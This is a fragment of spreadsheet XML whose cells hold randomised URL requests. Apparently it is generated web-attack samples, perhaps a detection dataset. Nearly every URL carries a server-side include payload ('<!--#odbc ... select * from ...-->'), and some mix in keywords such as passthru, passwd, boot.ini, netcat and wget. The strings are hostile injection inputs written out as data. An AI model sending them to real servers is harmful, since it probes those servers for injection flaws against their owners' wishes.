    <t>/xvlsbody/t94nvctzqral5oa/hpau1xm./vinsertjojvarobjectuv0zg/pnfnanaepr/toreceihuosb/wincludens2fe.fazekc/9a/chmfbgh6tbgsound/thek2vdgqq.gif?sqwlna1pnn=ni5-an&amp;imgj-acyq=xp_l+e4bodyhf;t&amp;lno=eyww6l&amp;raonty=bktqx-..s5m&amp;aza=&lt;!--++++#odbc++++statement=++"select+llme6x,+++++khaer2rr,+++++h2d+++from+++otonn+++++order+by++++6,+++++361,+++++2"+--&gt;&amp;qnio=du4_-&amp;n33zt=n3y7scn&amp;unpm=667&amp;.nqqsnq=?;n&amp;eis5iaijpei4rbe=edes(71a</t>
  </si>
  <si>
    <t>/sxc19awkqo21ve6/tren644qv_yrqht_nfv-/cy3mcy9dbqp5/wia5nf1y8wdr71r0qro/tiy4g64nnsrp3p/nhwor/4jwjq.s.msf?urklpk=esnin%u&amp;enroeasrdenon=snbt&amp;sluel94iioete=dba7wcv&amp;fhdclaeurd35oz0=284574&amp;rffonedn2u6quti=99138&amp;bw0pz1enroews=e&amp;piimztztrun=exec|4&amp;egsrestnhqdr=fyroaivas&amp;ielsohsddixcah=s7g@eknjiir&amp;eox=65329262&amp;https8likej6_b=&lt;!--++#odbc++++connect="aenhis,ed2,wsk"++++++statement="select++*+++++from++++ef"--&gt;</t>
  </si>
  <si>
    <t>/ii7syitqn2s3aceil/tyzn1bg@eee5a.xyr/fxlwe.png?cxlxg=bodynliker&amp;98aacwqwteheb=&lt;enode=:&amp;tliwomoiesbbwsi=&lt;!--+#odbc+statement++=++"select++xo,+to5lw,+++tyltlhl++++from+++snoa+++++order+++++by+++++6,+++++48,+++3"++--&gt;&amp;nilseon=48262422</t>
  </si>
  <si>
    <t>/gnieaoh/r@phs/7n/wcqnykpk/tbecebrtuzeweigate/@hnl8lwinntd/o3bkpperl8/amwmoojr34/hrly0.jpg?apteerssucsde=&lt;!--+#odbc+++connect="taemd,cs1n,ue2cn"++++++++statement="select+++++*++from+++obmn"--&gt;</t>
  </si>
  <si>
    <t>/d8atnftdorioobiayqo/m5n/eg4ri_4/snaooruksssnie.css?utut=r+g&amp;syea=&lt;!--++#odbc+++statement++++=++++"select+++thtivp,+++li,++++ptta9at++from++ssooo+++++order+++by++9,+++706,++0"+--&gt;</t>
  </si>
  <si>
    <t>/sf@g/qo0d3h/botnmia/ldnh/c8cfwll0ibiaugnecpc/arl25/lw0-cnx0kfli0ejs/nees4op/l73m/v7cecsixmnebimct/9tapn1mnnese.js?0@iykpasswdqq=a6&amp;deabe.ntj=agecvfff&amp;tlari8riijd81tq=y0a3&amp;t25etani2t4=&lt;!--++#odbc+++connect="anudvt,n4ri3a,ssr"+++++++statement="select+++++*++from++++a2tl"--&gt;&amp;lhws4=m&amp;sn=n3smiy&amp;robieeharodrtii=18786&amp;haser=th8oats</t>
  </si>
  <si>
    <t>/d8xtermekvfc2bdet1/lsl6y/orauhpe3css/9ddqnsoe2erhsroeo/mbwherehmwhapassthru.jsp?asnu2sehg3y=98544&amp;btcesbd=&lt;!--+#odbc+++connect="jj0the,ea,9rwa0"++++++statement="select+++*+from+st"--&gt;&amp;hdys8rie7=gqeo\\adoabncg&amp;gnht=ukd&amp;d1pobsz=+[deletel&amp;byuf-=25405235&amp;i8r6aonlgin=crvfvexecalwn&amp;gybsyo=rxossgiebr7neyl&amp;nteco=av04mg&amp;thvreute=ts7u0tjyj&amp;lq0dbo=ezrrg&amp;tehitnludnnn=4&amp;hedbwamd=varu&amp;jclusr=52135&amp;ye=rimr0+ce</t>
  </si>
  <si>
    <t>/mc7nulleobd/uazmjae_8zd2hmp/i1sqx95yhtni_jvg2/m4/wxmlwoptalog/lthsieesattoitaoc/qrnlcdethn/tzoauiertocstsjn/torgusj1vwufiq.shtml?metdaeeldonilec=7968996016&amp;dm5itgbnhsnedos=;$connectntaa0(&amp;acesz9grcoau=&lt;!--++++#odbc++++statement+++=++++"select+feeri,+++++oecu,+++pm+++from++i0ot+++++order++by+++++8,++49,+++7"+++++--&gt;&amp;dq=rop+e&amp;daesc2ioaihty=nff8v&gt;se5tsbinort&amp;jf=meurr&amp;imggl_=59fc</t>
  </si>
  <si>
    <t>/7mfor/osz/s_/seesimlenieh/hlrs0/fl45odisnagdrt/etseesept6metaeii/u5v/ipak9nt.php?frrohdeereeah=ru-nm7t&amp;nesalifrswooea=dhandnhaccess_log&amp;aarocytyui=164834&amp;gladminlag=3936770453&amp;l2aetfdp6rge=65544794&amp;sntiasbpeen=&lt;!--#odbc+statement+=++++"select+++lsle,+++e3foou,+++akefiqr++from+++4kn3h++++order++by++6,++++090,+++++6"++++--&gt;&amp;wivyelsnt=1&amp;qbevmsxbcuy=\\s</t>
  </si>
  <si>
    <t>/odetesdllhadonte/otv/os8kk73xtelnetk/no/rio4enybxnsgte/rpytc6ennxrd/enynr3qraqgrti/hqnqp@nsyc5a0lsxe/dy2q_t9mno_/e@vyrsewtt3y/hyacopyrkms1ftpu.htm?btjssbl=ib7w&amp;aopr=29&amp;l5vp0lc7-nm=&lt;!--+#odbc+++connect="6bwiot,feerfm,nnns"++++++statement="select+++++*++++from++rf"--&gt;&amp;2aatoeadbhh=282&amp;ooapeabhira=358280</t>
  </si>
  <si>
    <t>/nhaetnlgiehjjmt/abbh4sloiw726/lnxeqeovtiriadcs/oodewtrenlmoorll/tr4oahctyeat.js?l9viacet=&lt;!--+++#odbc++++statement=++"select++fgdesna8,+rsnae,+egsei+++++from+coefta+++++order++++by+3,+++43,+++++0"+++++--&gt;&amp;h0oi=e7hnoewesn2&amp;frdexai2=37963709&amp;nhwelne=9&amp;due=0480</t>
  </si>
  <si>
    <t>/sgendwyyz0wmcyd/dtanen9stf/tjnectptivgunfmh2@x1/fnnbtkyodai/xb.t@-ant2udyyn/ecfe7iieht/sprrstylecxn/5a8fit4htzurer/alt.bmnoiyduju0ep9t.tiff?_xj9jscript2=gefor6nyuupm&amp;aiihdct47scnl=82351&amp;lithmt=024&amp;p8p18am=lngno7nhoay&amp;necidorqee=fgrcnni3x4&amp;tsitnvwoawrep=saai8+r&amp;t5bcaahrbeheeg=tmeehzlnlgurd&amp;etuaitrer=&lt;!--+#odbc+++++statement++="select+++nn,++++elp4ti,++oo+++++from++hhgtech++order+by++3,++++80,+++2"++++--&gt;</t>
  </si>
  <si>
    <t>/bwigt5p5utyisi/p5elhr8smsm/lbsmgyypd0xzvugl.htm?tyroirvlqt=32917933&amp;wwselectnodexylxmld=&lt;!--+#odbc+connect="dndoe,jkimc,uion"++++++statement="select+++*+++++from+lhont"--&gt;&amp;pnmssw=78175&amp;iatii4us9ll2tf=ekfge&amp;hbj0iahs0oqm=degto</t>
  </si>
  <si>
    <t>/ioa9ynbs-3ol/pxfninputx0jopenvrknetcathd/i22binboot.iniudj/r5aeinmp8into/nehahsaheyjteeo/zwwz5hnm11ljgyaccept/ngwlnstg/ntsdneaaai0i1ei/6fciyos2pp/qtfect5e.jpg?c9msii9egsnee=&lt;!--+#odbc++++statement++=++"select++osceo,+++++erbjd,+mne+from+++++n8ryuis++++order+++by+++++5,++168,++++1"+--&gt;&amp;kby47geg_3=tmiife&amp;earntopmeo=79790&amp;qitmp95rseazinsert=vacenz+qgttnnd&amp;eicua4neusdocrt=sgfijl6fx&amp;dnavuslw=tscriptlta&amp;ib0x5scriptu3o96=c@e</t>
  </si>
  <si>
    <t>/spv41v-6qkqu7ylchf/tzoe/njueusj/tkbrcgmskresenpctron/o-kdbok0mawx6nhd/yo_uve0vtwv/em/sna.asp?htenlt=awuc&amp;mruun=83405&amp;eopettpoja=n5c&amp;eseih70wey=zan&amp;qi=&gt;ctdgvbscriptn2+c2w?(toda&amp;loddogouzioia=egtehpn1ujeetrx&amp;3mcsexura=y2&amp;ddllastltyhf=ov+openedonenst&amp;sa1a0jaua2aaee=4@1v2zsnpg&amp;t98nureh7o=&lt;!--+#odbc+++connect="eopesc,ad5n,8el"+++++++statement="select+*+from+++++bpg"--&gt;</t>
  </si>
  <si>
    <t>/ayxfe/hhherpndltwo4/is6toan/qmg5nhkucptaidotah.msf?access_logavgl24ig=+nlnk&amp;knn9zcenor3=edyl&amp;apppystyle6=ecs&lt;+script8\\esrbmp+se&amp;9.gb0=onsmr~eu6echol4&gt;5xec&amp;3c317=972668489&amp;ei=5passthrurouheti\\utsy&amp;etzshe7ssna=+linkoe'&amp;w3naw=001319332&amp;kmmms-ov=4756725&amp;noahmh4ewnipso=&lt;!--++#odbc+connect="ila,th,tcna"++++++++statement="select++++*++++from++iie"--&gt;&amp;uut8=aa0&amp;wqonv=8921089&amp;c_uxvbg2@=1&amp;oed6jilllinqe=ocdivle|sam&amp;immedhtioru=yoaertmioaaaeer</t>
  </si>
  <si>
    <t>/s1tejma9et1sqcp4/arnnearpa/s2i4vufam2/uqsbdkawq2hx/urrtabzh5cj/eii35etiii3rni9ehnan/ertvj62rrxj/aezv/mrcr7xtnallz.asmx?w2srrycr=&lt;!--++++#odbc+++++connect="eaqutiy,tu,eya"++++statement="select+++*+++from+++7r"--&gt;&amp;zct47rgmkfu=dpvi1inkbko</t>
  </si>
  <si>
    <t>/n_wyxueoawf96ne5yj/ujwrn/hcpilbpulg/tkiwunion/bxtvwhpcopynv/ae3eppm988i2pjq.gif?ai=f((e+oll4o$&amp;lenure9sg=e5zd&amp;ew6eedetcntrtt=sa7&amp;b2vq1ftnp=86718&amp;ua8tyeieowaho7=obh&amp;oculli=&lt;!--++#odbc++++connect="6sge,hpte,pmlc"++++++statement="select+*++++from++++mu"--&gt;&amp;lsfoaycncr=uei</t>
  </si>
  <si>
    <t>/hcmpm6n-/passthruhmtzghe/75eixligiihlhafoit/iuhpn5mxtermuvysdiy.tiff?eioeyue9s=iicalhte&amp;epn=723072&amp;trbxstrsonsnri=(da@icvjtt&amp;xhobjectaauvarckzv=6&amp;so=&lt;!--+#odbc++++connect="sh,fko,wdez"+++++statement="select+*+from++tnn"--&gt;&amp;afimiteblm=26377322&amp;dvuqnv=idv.rid&amp;dftnrmtirarefsa=rn3hibort&amp;wt6sdpgesaysah=riidaaab</t>
  </si>
  <si>
    <t>/eoitt9ahhin/l_ijzvupusij/rsgpkoqluox/eprrtj/nj9ft744mjjnc.jpg?se=&lt;!--#odbc++connect="gncm5,ottmg,hsc"+++statement="select+++++*++from++++yaa"--&gt;</t>
  </si>
  <si>
    <t>/i@ed/6grmwdprse/jgcoz8medex/3xeihblwdpgletzaeoqe/e9n0gt0lo7v.dwfrvz.exe?yf9hx8-ho=&lt;!--++#odbc+++++statement+++=++++"select++orese,++++gaot1aco,++io+++++from+++hrcm+++order+++by+++4,++318,+6"++++--&gt;&amp;l0cenzhnm0f=childe0r&amp;inb=ed&amp;ad4lmn4at='peo</t>
  </si>
  <si>
    <t>/edtiishhnnzmhtm/ihssmaeeonnp4/eusaaej1twedentncrx.js?rr=18344760&amp;7wsk0tcwaezyesd=erxfont8m&amp;busrov4d=&lt;!--++#odbc+connect="9m,lio,caa"+++++++++statement="select+++++*++++from++i"--&gt;</t>
  </si>
  <si>
    <t>/h5ownhamlnem/hhurcsji3klpu0nt3uk6/rcs/tsmtu8v/osxtdkk/cid4fuetbiw/ahhoc/kw14cespu/eds4ftbnetbq.mdb?6wnlnaasl=)llogr5q&amp;otma7ti=gf6reiolrco&amp;kabseruwhbsgi=863&amp;oxl1ij=od~enlucfnhd|o&amp;snsnp47tm=&lt;!--++++#odbc+++++statement++=++"select+++++c4so,+++ovosd,++tfsohir+++++from+++++tbtalse2+++++order+by+++++6,++++65,++5"+++++--&gt;&amp;oum4i=aaeomhos%hisq&amp;acetxssgssdal7=0tordzamevalndd</t>
  </si>
  <si>
    <t>/it5/dhh0e/jo6heweeay9mtxe/smwem/wfrzm_ta/agntoy.php3?f1=0&amp;erut6sgw19disr=rn|xon:imnaccess_logereplacelwa+m0[&amp;timoofvs0eitou9=eio&amp;2datoxuonnct=924&amp;sxcinu2y=opth&lt;f&amp;utseeha0d=aiframet3har&amp;rrt2cod592lcgn=&lt;!--+#odbc+connect="d4o8,rt9pr,lmtd"++++statement="select+++++*+from+++++oa"--&gt;</t>
  </si>
  <si>
    <t>/ovtdiaid/dftps8ofvb2orx/msoo5rec4ess/apph-/1r.exe?raatd0aiw2aer=&lt;!--++#odbc+statement+++=++++"select+++++enw1nh,++ts,+lagp47di+from+++oan2sh+order++++by+9,++377,+6"++++--&gt;&amp;roetasomt=r3bjjfivocr&amp;snm4tpaher=gse&amp;daqiponi4worbau=like2oem</t>
  </si>
  <si>
    <t>/rv/lbnenrshoeteeketumao/eoh0.jpg?sattntrlddtis=&lt;!--+#odbc+connect="pibh,laady,1aono"++++statement="select+*++++from+++++imus"--&gt;</t>
  </si>
  <si>
    <t>/lon/hre0kolmel48jw0vqg/26s/t_wleemrucqif@6/h5zrwkr2vvsw/st_s.8wra/ukf/uhtzmwuebm4m/hqbrs576axanca/se/bhwselect-fsdelete5q/lvhttpselhusr_fxe.png?b_xgqftpdfv.=01489&amp;toosmgeino4he=a&amp;remioamsisndsv9=5s6&amp;ze29groupbymnlnpetmp=142885&amp;a9=btiu+&amp;yo0my9=&lt;!--++#odbc+++++statement++=++"select++ciroiimi,++++2emlyo,+++++er8e++from+++pramogero+++++order+by+++6,+++++22,++0"+--&gt;&amp;4ktr=qnull+tpitlwk&amp;sajtrsor5ees=netr&amp;sat6b8twpac=mu&amp;lfnzednte09i0t=8031806&amp;0g=8tmp\\eadivytelnet</t>
  </si>
  <si>
    <t>/graboot.inixtpno/cyl-mcxk/voii6ltnicra4geia/u8/passthruknvjtxepvmh@/bqf3etaa3paeu/_mochay0vwomailb/bn.htm?watqc7l2ghr=patieaeata&amp;wdsnven=agefe&amp;h1smiosawng=tuui_&amp;mochaweop=ahomehttpistylet7s~&amp;dbi=9udgwh9h451&amp;psesisoxc5tbyld=az&amp;vhbqdxcjhaving=r&gt;&amp;etc=g.0llvt&amp;ns1e=aeytmp\\o+r+|+&amp;|ah&amp;rsaot=&gt;nttf&amp;baeswebshrmr2=&lt;!--+#odbc+++statement++=++"select+++n2zdcf,++soslrcur,+++++pe+++from++++holn++++order+++by+++++5,+92,+++++4"++++--&gt;&amp;e4usogst=69292597&amp;pweilea=y9n&amp;hatuh8adusrk=stbcslt</t>
  </si>
  <si>
    <t>/ib8zjfyg9ga_d4codz-.jpg?gmariahsue6oi=owhi&amp;bepoitidjnvlht=in28rlwaiqmx&amp;eorrr=ridoqvhiici5&amp;kpwapzp.idys=6&amp;ouyqtpeeestcre=yjvbehrdierieah&amp;qfwo5o=&lt;!--+++#odbc++++statement++++=+++"select++lcrrs69,++tea,+++++hlehss+from+ia2atmg++++order++++by+++6,++++14,+6"+++--&gt;&amp;i61lnseh7soafu=a+he&amp;aoihn=8546&amp;spctxple8=4280216&amp;egzp=ewiohfre&gt;&amp;doispertr=59&amp;4mwyeo=ri&amp;rt=z+h&amp;ildeprkte=otn9|ne\\phpn+i:er0</t>
  </si>
  <si>
    <t>/os0eerqjimqt/include9p4uvp/e3eqtt/muaoxoxsssrouc/slmlef/r@ofwkk4vm/emvfv621nmbm1_tu/05b4d/8ses/r4pzey2k-0kft.html?gecx=]0&amp;urem=&lt;!--+++#odbc+++connect="ovqa,onae,tnri"++++++statement="select+++*+++++from++atean"--&gt;&amp;7hhu=gv0@zo2mp</t>
  </si>
  <si>
    <t>/vnin/aela5-/cglrvkow.clbt91jnn/z8xr90p9w/tzvjf._0hvaprh/-h8r0haccess_loggd/tesrm0vix/8y1setoeeanhten/delete4taqhu_0.nsf?chd2tebetne=ptieietasoffue0v6&amp;strhd=otr5sdsraweeant&amp;e6rerbya=uaopn&amp;etawr=3965&amp;tle5s=7aeyl-&amp;8ygraonub9a1=&lt;!--#odbc+++++statement=+"select++cehod,++++utne3een,++1udlwn+from+++rsthwr+++++order+++++by++++9,+++++90,+9"+--&gt;&amp;tnnhadsalflchta=25&amp;ta0rhtiexi=nmdgcgs&amp;pssfsgqzw=6p_sjs&amp;f8neo=70</t>
  </si>
  <si>
    <t>/n8vy0nokklutq/ccr57rd57nlh2a6cv_af/c_.zwnlctlkk/ef@yfcopyldxjn.swf?spees9eab=7aeineq-wi%d&amp;meialdeeesu=&lt;!--++#odbc+++++connect="z6t,ele,xlhe6"+++++++statement="select+*+++++from++++nct4t"--&gt;</t>
  </si>
  <si>
    <t>/dgordzmzt/nu4atxmakobcbyntu/b3uhynhjtq.tiff?gxbozomlmu=&lt;!--+++#odbc++++statement=++++"select+++iosel,+ecqro,++++md++++from++s1shqx+++order++++by++9,+++32,+++++6"++--&gt;&amp;vhome1p0zpf_=700895&amp;58h4eoanrlya=zucteaotsastea&amp;anaf5nen=886788603&amp;9mpkuhcm=&lt;a+h;mb</t>
  </si>
  <si>
    <t>/lpeerfardkdco5oeott/pzusrdv/ezappz_5ztegxw/oe/aauaxwechod0lzo/inj/avluhqhpo/aausyqd/ng1etoluklyimvb8az/f44wq/azlib4tobject_frt35ni/swoynhcs.sh?nytxufromholink-=gz+feote&amp;siy1lh2shcm=&lt;!--#odbc++connect="degee,hhe1h,l9b2"++++++++statement="select+++*++from+esy"--&gt;&amp;sniidhealeers14=3787&amp;tgi=eixaieuhod0st&amp;3erptza=hservices5mobjecttai7udkfitwindow.openh&amp;nph-bgsound5sgnulls=gyt</t>
  </si>
  <si>
    <t>/tpbmjrpd/r9epkuziaccept./pskznso/bbvbgdw-tqf4/elcolpobswr43t/hkfw.tycz/samcmq5mwdnpassthrul0bq/eet4etsi5y/islbtraayus7dae.htm?rpsystemfxml3=90490503&amp;wreyhwtrieu=&lt;!--+++#odbc+connect="jztot,olt,fano2"++++++statement="select++*++++from++go"--&gt;</t>
  </si>
  <si>
    <t>/berg8-beg/lcvcetnmqqextgb.m/trychpenet/reocohzb@vuycl.jpg?9aoef3yhgt=oet-&amp;egddu=&lt;!--++#odbc+connect="hexn,vii,noyv"++statement="select++++*++from+++aorf"--&gt;&amp;aee7itesnsn6a=1th</t>
  </si>
  <si>
    <t>/d6z1j3zsmivgvsl-ck5i.php4?eshn3iaauen2y=48clnhdaclcueb&amp;qcbetweencklrsum=&lt;!--+#odbc+++++connect="axk,lre8,ypaet"++++statement="select+++++*+++from++0w"--&gt;&amp;dteotenett=wzpk3@qv</t>
  </si>
  <si>
    <t>/otrntr9ostnaic/yj6fdn/ee@7k4l8dvb2gcndgry1/hleopv.js?srea=4bdp&amp;hn=ll&amp;ni=23455136&amp;-yz6tzc89=&lt;!--+#odbc+statement++=++++"select+++oleeaozh,+df8hi,+++++3gy++++from+++anee+++++order++by+++++5,++++020,+++++8"++--&gt;</t>
  </si>
  <si>
    <t>/wf90/lo/ldnsrslloa/orvacopyt_4w6window.open5nf/wzged-akvmx/wnnadiithrh/oqef.dnl99vnpz0/eve3p7rr6cr4rqjgibwh/lllsr/noxa1ecssikrowelb/qlasveise/mjdrmnnql.js?5onla=&lt;!--#odbc+++++connect="sna,lj,6it"+++++++statement="select+++*++++from++++foj"--&gt;&amp;ors=aa+s</t>
  </si>
  <si>
    <t>/tdlm/ztfeoutxraheh9sm/8jetbrsieymnfonnmtut/xkltmochay/qn/vsmie67s4eahrgdr9if/rebsx/eg8k9fopq7oaiwy.js?sjth=&lt;!--+#odbc++++connect="rrsmcei,eh,thr"++++++statement="select+++*+++++from+++++emiah"--&gt;&amp;iinclude3r=atdr</t>
  </si>
  <si>
    <t>/uo6oyoeefit8x/chqhfgs/imfn6cmlajohneircn/mivilrhl/i0gofo.nsf?3nijc3hlheicmbf=eqfs9-dnls&amp;qviframe0ubntvftpa=tese&amp;iisfaeih=&lt;!--++++#odbc+statement=+++"select+++++5retnse,+++++tbaedneo,++++raipont+from++++6gli9dcft++++order+++++by+++++9,+++++27,+++++5"+++++--&gt;&amp;hhvesyfchhixeiv=eermariandhjsno&amp;iaaa_p_m=b1t&amp;ibncvtaor=h(et&amp;xvdzhboot.inifqti=feuedu5@nog</t>
  </si>
  <si>
    <t>/bir6k2jqt9/ndtehet3aoht/o2hof/egrgokfi1s7ri5/ealanerl/anoske3suedrnoobm2e/eier8k3ht1aoe/nirtchhaeacrhhdkn/9o.mspx?dnevaagcssaheh2=xaim149os&amp;w6xw_=dkegel6&amp;8ly914q0py=n5h&amp;gk9nazagtlnies=enukyu5uuxz&amp;oxyl3bftoa=2983849&amp;dbb6s=er3ahsee=&amp;naesgaf=cey&amp;wgsuatosktemeo=1&amp;oaoshk=ti+%ueeriiea8sne+&amp;t9nsudfsbnlaji=28&amp;otohenkalzh=&lt;!--#odbc+connect="seai,le,vnt"++++++statement="select+++++*+++from+++atlsc"--&gt;&amp;c9ai=wehsnar?dt&amp;nf5eoufy=&amp;cius+ctrtf7sh&amp;t5hvuo=5134215976&amp;zd6egihwltzkspn=lrrccxsh</t>
  </si>
  <si>
    <t>/y_zy8zwatwmsvewv/gghn9trshutdowncbl.aspx?rihe=ibzk1q-m_kku&amp;hk1awee=&lt;!--+#odbc+statement+="select++t5,++tpo,+++aneo++++from++++0aah9hgaem++order+++++by++++6,++++403,+5"+++++--&gt;</t>
  </si>
  <si>
    <t>/idjljg6mdru@bhwka.shtml?io=pse&amp;ifp0yekq6e3e=ho+catt&amp;ama0u20b2e=&lt;!--++#odbc++statement=++"select+++++ti,+ht,++++oesn+from+++hosewonl++order+++++by+++++8,+++780,+++++1"++--&gt;&amp;pu6ybetween7nrijj=wnemocapsock_streami</t>
  </si>
  <si>
    <t>/pqqwqataoq5/nahtnweeoeunoo/sbabno/totwk2aoa5nb/hctmmzdqa/aj/rrtaldsa5lfgm.pl?uw=27499&amp;he=ap1]&amp;uh9ij7oj3=eh8sru0dte&amp;iartt9oelialir=230671&amp;cs_g3=ibyrzebh0&amp;ellpfgdtc=qswherem~larjexeco9qa&amp;raeksa=&lt;!--+#odbc++statement++="select++rl5roe,+++++elhar,++++mlybesg1++++from+r0etovs6+order++by++2,++083,++8"+--&gt;</t>
  </si>
  <si>
    <t>/d6tnuherascx/ds1j0t/5dcb371yjgfjk/tiihsir/lzre4nnntatvraa.cfm?rf8xcypx11l=abu&amp;wclmoinzs.s.=&lt;!--++#odbc+++++statement+=+++"select++ocsxcooh,+++df,+++++1e+from+++++rurooizpl+++order+++by+++++4,+++++63,+++1"+--&gt;&amp;th=j:&amp;lstpc=\\wt@+&amp;rn35servicesj71=26740375</t>
  </si>
  <si>
    <t>/w-tbifghxm.gif?nnodzkni=m7cazh&amp;oo1=hdssidvetamr&amp;d9enrckfifekcjh=67&amp;ig=90795&amp;mhasofr=rqsr&amp;ttste63a=3o&amp;dngkn7q7no=05658&amp;4exgdehunjy=75428875&amp;nefea=&lt;!--+++#odbc+++++connect="goass,nmehn,oh2"++++statement="select+++*+++from+++++na"--&gt;&amp;thrq1n1ov=an&amp;izr8id=its8at2iteewdm&amp;ino=7433352&amp;na=edmcsbbzxvw&amp;irdr0lt3tentu=5tonx6dd(a&amp;rmepirihaii=ikuf</t>
  </si>
  <si>
    <t>/fadminkimg4xb8_alpb@b/isaqyce1na/s@zwxwbfdnh-e/2r1chhxam7lthv-u.mspx?aecaeinea=&lt;!--+#odbc++++statement++=+"select++eeaaul,+++++hhort,+5ilsyin++++from+vedm+++++order++by++0,++++901,+9"+++++--&gt;&amp;fknod9=ir&amp;ihq58-l=716566</t>
  </si>
  <si>
    <t>/ksvle_skqijkki8zwhxk/t7drcp@dig2tizp8/zmtkyixkgrm5/ie84/atmejxs4qvesg9hq8nt/q5mnne./to@0lq6hoqovj0rkcng/wwzmaosock_streamlwly/gaw3r/5kclkcdhmgg3gw7o.php3?lutb8nle2tsan=9&amp;1r=teethionr-+m8&amp;notsjt81hw9p3=slt&amp;vaw6h=&amp;asmnm&amp;rhdsnneuech0i=u20&amp;bxvur=70635587&amp;v1j5wp-xml=54&amp;utscriptkyhttpskdp0nph-=tdt_am9dcup&amp;artoptatanaqtte=&lt;!--++#odbc++++statement+=+++"select++oc1,+++3ss2tbi,+++++g3tsaib+++++from++e8enms++order+++++by+++5,+58,+2"+++--&gt;&amp;mc778rr0u=0166018602&amp;n@fx=euo:fi&amp;tezp=p7dli</t>
  </si>
  <si>
    <t>/uo2ado/jwvzzxterm6rbb/lumj/aj4gxwf/croq3cwqpr%uzabinz/stsmaiina/iqdgohu5ytq/fn%u/vmvw64i6b7/tsndoseuaeeijtyaams.js?ewatedaay=ffl&amp;lpitd6lev=;ulocationstyleoenlrhqee+g&amp;ou5fsfnt=&lt;!--+++#odbc++connect="zl,owtp,do6ef"+++++++++statement="select+++*++from+++s"--&gt;</t>
  </si>
  <si>
    <t>/l8detcscritupnoo/r.2pjmmxbe8/nnsaoynca8e7aa/ectcd.mdb?ernlxcdrios=51150616&amp;0ydl=0g&amp;n8ottta=80053887&amp;etahrsem=4966487500&amp;aa8aforioossn=7224384&amp;4srsui=eseastubeau&amp;lrbhglwrcds=&lt;!--+#odbc+++++connect="7au,hjqhdn,nu9oo"+++++++statement="select+++++*+++++from++++b"--&gt;&amp;tstn=eohe)aac&amp;lexukmeeeset=s2&amp;se1aczj=76051&amp;mresrlxi7k=+jntoytbgrfts&amp;aetin=huklhj&amp;kwxez1ozshavingw=417312&amp;isoequhyi=ofonponucecmaewsea&amp;01nodeo=+t</t>
  </si>
  <si>
    <t>/3arhirweshb4lm/lpsxywoaplhjqn/cpo/m9caqmk/paqqs/tle/n5h9mcy2d.ewgl8jc3/kelieseed2tf3t/xjtl.mspx?.cmiv=&lt;!--++#odbc++statement+=++"select+++staerlrv,++++o5,++4h++from++++ntrtsjd99+++order+++by+++3,++++976,+++1"+++--&gt;</t>
  </si>
  <si>
    <t>/m2ho/tslafeeh/3ti0ct/a1ssc59netcat7/nq9xo_-7wiv-zyqajpy/iieiktnaglto/n8ef4kdkgy5wcw/patobdes5elsm/dk5ulejrwtsbb/iaiiggfimisa/0fconnecttv@vqunionom/iua@js83--ff.45675z.jpg?rkgibrysolp6sie=(ebn%u;ssselectlrsyre&amp;gdnh=telnetis&amp;2s=0shs~jekjeebe&amp;ituc40tiott4db=+p&amp;oeb6sy=lni+gszssul(9&amp;_c7hohoautoexec=&lt;!--+#odbc++++connect="see,imo,btsy"+++++statement="select+++++*+from+++ho4ts"--&gt;&amp;pbcel0o46ai=055</t>
  </si>
  <si>
    <t>/necbhpewz.mspx?obcn=7gteao&amp;q1oohbish=33&amp;0mifn=itatgiediifmrin3bt&amp;7ysjb4=&lt;!--+++#odbc+++connect="beeo,te,eagre"++++++++statement="select++++*+from+++++t"--&gt;&amp;me2ssurnvhina=meppvq4tptc&amp;itreti=[wwget&amp;qna6@dz6=iat&amp;inaimeclhtnpsth=nnf6&amp;er=tt&amp;ufs2e4dasytofp=ed&amp;taajoy=sr39mtae&amp;nosrwtodtc=ahi</t>
  </si>
  <si>
    <t>/crwq5rrvqvis1iou/rhksxx@mrins-6h1ikm/epaerwenn1os.cgi?yn34=abp-61vsdccm&amp;2sfdno=iyp@mnnw&amp;atar=670&amp;ccpx8r=ivst&amp;8ia0sstyleevalpassthrun=ez.bj7muvdrt&amp;2tsssy0sesmnh=efo?astmpusw2?7o6fta&amp;hspstefrcm=ins&amp;oelawy6e=160&amp;ejtrf2e=o-tt3&amp;risur=3hptuwe74soti;e&amp;efm=lk&amp;7edsravhrvge=ireiisid+a:&amp;siai=87&amp;bftpjxm6ub=&lt;!--#odbc++++statement+=++"select+++tlyewai,+++etbpd,++ii4+++from+vhtr29+++order+++++by+6,+++49,++9"+--&gt;</t>
  </si>
  <si>
    <t>/hjfdhoh-s3divmqy/gedjlibiotni7s.tiff?d5enn=0&amp;lmeearexyrouue=ajimg9tiniaso$ytpsaincludet&amp;a22hoisu7aetits=aatzalu&amp;gnyxngc=tli&amp;igsft8=sacaeek1e0txs9s&amp;oaensiu=86422904&amp;g6p8aisefasnnp=&lt;!--++#odbc+connect="se,ua6ca,rucl"+++++++statement="select++++*+++from+i"--&gt;&amp;_1dbscmdc7eaee=yw</t>
  </si>
  <si>
    <t>/ctmwkjwrclluq/0broqe/ry5kwfisd.k/rpqpstdind/7hlnqanr@yci9td/ip8h-ssuxz/hfndfryt/aetse/eai8icoeneios/eliz5f5nzqrpes2mrriq.aspx?oi=meit&amp;2ortid4iieehch=eun&amp;l8yjoechoqbc8=14&amp;ttskrpfctu=-td-w&amp;qnwcegias=941&amp;bpes4ttbekscmr=]0+/u&amp;objectjkogg4od=81157&amp;itey=41427&amp;nktccetnq=988&amp;tsrbrirneee=900539&amp;lja=5441321&amp;ayil9or7u=6382116&amp;f2=u+ixml8&amp;delireedlmngpfh=soal&amp;asodintvab=5</t>
  </si>
  <si>
    <t>/izfluaqlaqsl/zdpasswdxcatqmte6anhtaccespm/h9lchoahs/.45betweeni.dll?ngi44oka6ytd4s=rtaan+rgz&amp;iyxwaw@z=weeunkrhingt9&amp;gyowsglocation9=aisf(hnt+fne;|:|ye?&amp;jfbpn=oe&amp;isteqao=?epe</t>
  </si>
  <si>
    <t>/hflzy6/0204kmzf8aavcvtk3e/edddtriw0/avll8vv/idtgrfhdgn.html?lojh1oae=i?d0\\ssystematm2ontdelete+irta&amp;im=|ylr/r7wo&amp;8zmha9rjee03qi=ev4c&amp;toaaeeu=3693370&amp;ee3e=&gt;&amp;sx=uje&amp;oe=wmt+d&amp;terh=mhbttpo3lien&amp;sehmteentw=047636&amp;qga=n&amp;tpyk_=ifbr&amp;ngrltj5=gu&amp;sotle=ielearbtotema&amp;0t7huht6e=e-&amp;12orimyathzo7l=0578128113</t>
  </si>
  <si>
